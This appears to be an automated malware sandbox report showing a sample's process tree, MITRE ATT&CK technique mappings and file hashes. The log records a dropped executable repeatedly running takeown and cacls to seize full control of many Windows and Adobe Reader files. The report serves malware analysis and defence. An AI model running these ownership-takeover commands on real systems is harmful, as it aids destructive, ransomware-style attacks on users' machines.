
C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"
1⤵
- Modifies file permissions
PID:3500

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C
1⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
1⤵
PID:3732

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3636

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "qmgr0.dat" -nobanner
1⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "qmgr0.dat" -nobanner
1⤵
PID:1724

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
1⤵
PID:3420

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
1⤵
PID:1944

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "background.png" -nobanner
1⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "overlay.png" -nobanner
1⤵
PID:2352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "overlay.png" -nobanner
1⤵
PID:3592

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
1⤵
PID:1272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-839890057-2089204058-1717933921-1127463696182404169-187986177852621083-1675297953"
1⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner
1⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2100

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui"
1⤵
- Modifies file permissions
PID:2440

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
1⤵
PID:1972
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
  2⤵
  PID:3128

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CP1258.TXT" -nobanner
1⤵
PID:2536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13042853951660741407-1041481693-1787273248-141039755710461329281452616770-508916529"
1⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CORPCHAR.TXT" -nobanner
1⤵
PID:496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CORPCHAR.TXT" -nobanner
1⤵
PID:2684

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
1⤵
PID:2772

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
1⤵
PID:1388

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "usa03.hsp" -nobanner
1⤵
PID:1112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa03.hsp" -nobanner
1⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
1⤵
PID:2984
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "superbar.png" -nobanner
  2⤵
  PID:1768
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  2⤵
  PID:2996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1898740516-12358196266046988801064149-492169023-3395190312095835-899050473"
1⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3904
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:2000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "symbol.txt" -nobanner
  2⤵
  PID:1756
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
  2⤵
  PID:3688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can.hyp" -nobanner
1⤵
PID:2292

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
1⤵
PID:2540
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:1428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner
  2⤵
  PID:1060
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
  2⤵
  PID:1744

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
1⤵
PID:2996

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
1⤵
PID:1744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-402604571-7830961391088317070-6460331-1040908554-1245135853915156893466111413"
1⤵
PID:3984

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "MinionPro-It.otf" -nobanner
1⤵
PID:4072

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "rss.gif" -nobanner
1⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "reviewers.gif" -nobanner
1⤵
PID:4236
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "submission_history.gif" -nobanner
  2⤵
  PID:2560
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:5048
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
  2⤵
  - Modifies file permissions
  PID:5048
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
  2⤵
  PID:2840

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
1⤵
PID:4948

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
1⤵
PID:4804

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "bl.gif" -nobanner
1⤵
PID:4344

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
1⤵
- Modifies file permissions
PID:1708

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
1⤵
PID:4400

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4692
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "RTC.der" -nobanner
  2⤵
  PID:4744
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
  2⤵
  PID:4280

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4748

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
1⤵
PID:4336

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4048

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
1⤵
PID:4292
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
  2⤵
  PID:4632

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3108
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
  2⤵
  PID:4116
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
  2⤵
  PID:4044
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
  2⤵
  PID:4092

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:2392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:4116

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:2188

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:3608

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3148

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
1⤵
PID:3180

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:4252

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3956

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
1⤵
PID:4312

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
1⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4676

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
1⤵
- Modifies file permissions
PID:2884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
1⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
- Executes dropped EXE
PID:1208

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:4076

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
1⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "blank.jtp" -nobanner
1⤵
PID:2012

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
1⤵
PID:1712

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
1⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4176

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui"
1⤵
PID:840

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui" /E /G Admin:F /C
1⤵
PID:4580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
  2⤵
  PID:4548
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
  2⤵
  PID:2460

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4548

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
1⤵
PID:4316

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
1⤵
PID:3576

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
1⤵
PID:3708

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
1⤵
- Modifies file permissions
PID:4560

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CP1253.TXT" -nobanner
1⤵
PID:1868

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-22483709284547986210302538521751705935-1088950031-16533787351194078991941576164"
1⤵
PID:2688

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "eng32.clx" -nobanner
1⤵
PID:2848

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
1⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-Regular.otf" -nobanner
1⤵
PID:2716

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
1⤵
PID:2320

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "RTC.der" -nobanner
1⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:4780

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
1⤵
PID:3112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1111473428-256038075-12229851176747268171697896324-8009260301187419914-963193075"
1⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
1⤵
PID:3732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
1⤵
PID:3476

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C
1⤵
PID:2132

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
1⤵
PID:3472

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"
1⤵
PID:2792

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C
1⤵
PID:2108

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1964

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui"
1⤵
PID:1144

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui" /E /G Admin:F /C
1⤵
PID:2728

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:3396

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"
1⤵
PID:912

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C
1⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:4592

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
1⤵
PID:1956

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:2600

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui"
1⤵
PID:1104

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
1⤵
- Executes dropped EXE
PID:600

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:952

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"
1⤵
- Modifies file permissions
PID:2724

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
1⤵
PID:1608

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "superbar.png" -nobanner
1⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zdingbat.txt" -nobanner
1⤵
PID:3980

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
1⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4832

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
1⤵
- Modifies file permissions
PID:4852

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
1⤵
PID:4984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2076181394-911270283-542775974-177525646-7832361801298887536-1908225045-462105779"
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3860

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
1⤵
PID:2080

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
1⤵
PID:5040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2499585722111835653-67730973-129768208310353520116873820701498098838-1063875610"
1⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2348

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
1⤵
PID:2700

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
1⤵
PID:4480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
memory/1152-7353-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1152-7311-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1356-7387-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1540-7310-0x0000000000340000-0x00000000003B7000-memory.dmp

Filesize
476KB

Download
memory/1644-7412-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1664-7279-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1748-7301-0x0000000000280000-0x00000000002F7000-memory.dmp

Filesize
476KB

Download
memory/1840-7269-0x0000000000500000-0x0000000000577000-memory.dmp

Filesize
476KB

Download
memory/2004-2636-0x00000000002E0000-0x0000000000357000-memory.dmp

Filesize
476KB

Download
memory/2004-7296-0x00000000002E0000-0x0000000000357000-memory.dmp

Filesize
476KB

Download
memory/2032-5-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2032-7276-0x0000000000400000-0x0000000000FA5000-memory.dmp

Filesize
11.6MB

Download
memory/2032-29-0x0000000000280000-0x0000000000281000-memory.dmp

Filesize
4KB

Download
memory/2032-20-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2032-18-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
